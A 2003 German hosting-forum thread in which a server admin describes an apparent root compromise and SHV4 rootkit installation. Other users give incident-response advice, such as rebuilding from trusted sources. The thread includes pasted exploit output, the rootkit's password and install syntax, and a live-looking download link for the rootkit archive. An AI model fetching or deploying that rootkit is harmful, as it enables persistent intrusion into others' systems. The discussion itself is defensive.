-> Detached from modprobe thread.
-> Committing suicide.....
-> We survived??!!??  : No such process
bind: Address already in use
bind: Address already in use
grep: /var/log/httpd/confixx/confixx.p100.pureserver.de_access: Permission denied
grep: /var/log/httpd/confixx/confixx.p100.pureserver.de_access: Permission denied
grep: /var/log/httpd/confixx/confixx.p100.pureserver.de_access: Permission denied
grep: /var/log/httpd/confixx/confixx.p100.pureserver.de_access: Permission denied
[Sun Aug 03 16:42:28 2003] [warn-phpa] No mempool 2 memory (pid 25778)
[Sun Aug 03 16:42:28 2003] [notice-phpa] shm cache temporarily disabled (pid 25778) 
Nach diesem Angriff der im gegensatz zum zweiten Angriff erfolgreich war, lief auf Port 55555 irgendetwas. Habe ich aber sofort mit IP Tables gespeert.
Er hat also zumindest Teile seines Rootkits anbringen können .... :(
Es ist auch an den Logs zu erkennen, das sich eine Telekom User als root am System angemeldet hat. Mehrmals sogar.
Womit Du erkannt haben solltest, dass Dir iptables nicht weitergeholfen hat
Die lokalen User möchte ich mal ausschliessen, da keiner einen shell Zugang hat.
Was aber auch keine Garantie darstellt ...

Ich gehe mal davon aus, das ein richtiger Hacker sich nicht mit meinem System beschäftigen würde. Daher glaube ich an ein Scriptkiddy, das in den nächsten Tagen ein sehr hohe Rechnung und eine Strafanzeige erhalten wird.

Das ist dieses besch*** "Zielgrppendenken !!! :evil:

Wie kann man nur so naiv sein zu glauben, dass man "nicht interessant" sei ??!!?? Solch eine Unverwundbarkeitsvermutung ist komplett hirnrissig!!! :evil:

Ist Dein Server denn mittlerweile wenigstens im Rescue-Modus oder läuft der munter weiter ?

captaincrunch
Userprojekt
Userprojekt
Posts: 7225
Joined: 2002-10-09 14:30
Location: Dorsten

Re: Showtee Rootkit Hacker Angriff

Post by captaincrunch » 2003-08-05 21:24

Jau, da hat er bereits Dein System geknackt gehabt und installierte das Rootkit mit PW "fregna" auf Port 88990 ...
Ã?hm ... IMHO gibt's nur 65535 IP-Ports ... ;)
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc

dea
RSAC
Posts: 619
Joined: 2002-08-13 12:05

Re: Showtee Rootkit Hacker Angriff

Post by dea » 2003-08-05 21:49

CaptainCrunch wrote:
Jau, da hat er bereits Dein System geknackt gehabt und installierte das Rootkit mit PW "fregna" auf Port 88990 ...
Ã?hm ... IMHO gibt's nur 65535 IP-Ports ... ;)
lol - ist mir garnicht aufgefallen ... Installiert wird das Kit mit dem Aufruf './setup pass port' ... - selbst dazu war der Kerl zu dämlich ... ;) Ironie des Schicksals?

webhilfe
Posts: 67
Joined: 2002-05-03 14:20
Location: Hamburg

Re: Showtee Rootkit Hacker Angriff

Post by webhilfe » 2003-08-05 22:25

Wie wäre es, das System auf einem lokalen Rechner "aufzubauen" (rpm macht es einem nun wirklich leicht) um anschließend die Paketen hochzuladen und zu installieren? Das erspart Dir nicht nur Compiler und Konsorten sonder u.U. auch 'ne Menge Mehrarbeit weil Du lokal in Ruhe testen kannst. Mal ganz abgesehen von den Auswirkungen auf die Systemsicherheit ... ;)
Das habe ich auch eine ganze Zeit lang so gemacht, aus Zeitmangel bin ich aber davon abgekommen.
Jau, da hat er bereits Dein System geknackt gehabt und installierte das Rootkit mit PW "fregna" auf Port 88990 ... :(
jepp, dach wurde der Rechner ja auch reinitialisiert

Code: Select all

Apache error_log:
[Mon Aug  4 14:35:32 2003] [error] mod_ssl: SSL handshake failed: HTTP spoken on HTTPS port; trying to send HTML error page (OpenSSL library error follows)
[Mon Aug  4 14:35:32 2003] [error] OpenSSL: error:1407609C:SSL routines:func(118):reason(156) 
Welche SSL-Version hast Du denn im Einsatz? Da gab es mal vor einigen Monaten ein heftiges Aufschreien bei den Betreibern ... Würde mich nicht wundern, wenn der Angreifer darüber reinkam.
mod_ssl-2.8.14-1.3.27
openssl-0.9.7b

Ich rate Dir, trotzdem nochmal alles auf Notwendigkeit hin zu überprüfen.
alles was dort installiert ist, ist für mich auch notwendig.
Den Mailserver und den Nameserver werde ich aber auf einen anderen Server legen.
Er hat also zumindest Teile seines Rootkits anbringen können .... :(
Nein, der Angreifer hat beim ersten mal sein rootkit komplett anlegen können. Beim zweiten mal ist Ihm das scheinbar nicht gelungen weil ich das entsprechende Verzeichniss gespeert habe.
Ich gehe mal davon aus, das ein richtiger Hacker sich nicht mit meinem System beschäftigen würde. Daher glaube ich an ein Scriptkiddy, das in den nächsten Tagen ein sehr hohe Rechnung und eine Strafanzeige erhalten wird.

Das ist dieses besch*** "Zielgrppendenken !!! :evil:

Wie kann man nur so naiv sein zu glauben, dass man "nicht interessant" sei ??!!?? Solch eine Unverwundbarkeitsvermutung ist komplett hirnrissig!!! :evil:
Ich denke nicht das ich so ein Zielgruppendenken an den Tag lege.
Ich habe auch nie behauptet, dass ich unverwundbar bin.
Im gegenteil. Ich gehe davon aus, dass man in jedes System eindringen kann.
Das kann meiner meinung niemand sein, der sich damit 100% auskennt. Also bleiben da nur die Kids.
Ist Dein Server denn mittlerweile wenigstens im Rescue-Modus oder läuft der munter weiter ?
Hehe, der Server läuft momentan ganz normal weiter. Ist auch nichts auffälliges festzustellen. Wie gesagt, der zweite Angriff ist ja zum Glück fehlgeschlagen.

Ich werde jetzt erstmal abwarten und danach den Server nochmal neu aufbauen. Werde wohl die SuSE 8.2 zum Einsatzt bringen.

Den Traffic habe ich im Auge :-)

Das Programm welches der Angreifer installiert hat ist hier zu finden:
http://www.zlotow.net/~shcrew/web/files/sh/shv4.tgz

Wer lust hat kann ja mal.... :-)

@dea

Ich denke mal das ich das ganze durch das einfache sperren des .tmp verz. rechtzeitig verhindert habe und der Angreifer es nochmal ohne erfolg versucht hat? Wäre ja möglich :-)

dodolin
RSAC
Posts: 4009
Joined: 2003-01-21 01:59
Location: Sinsheim/Karlsruhe

Re: Showtee Rootkit Hacker Angriff

Post by dodolin » 2003-08-05 22:36

Hehe, der Server läuft momentan ganz normal weiter. Ist auch nichts auffälliges festzustellen. Wie gesagt, der zweite Angriff ist ja zum Glück fehlgeschlagen.

Ich werde jetzt erstmal abwarten und danach den Server nochmal neu aufbauen.
Das ist grob fahrlässig. Sollte nochmal was passieren, könntest auch du dransein, wegen Mitstörerschaft oder wie das im Amtsdeutsch heißt... Nach einem Hack sollte man IMMER (!!!) den Rechner komplett neu aufsetzen von gesicherten Quellen. Alles (!!!) andere hat keinen Sinn.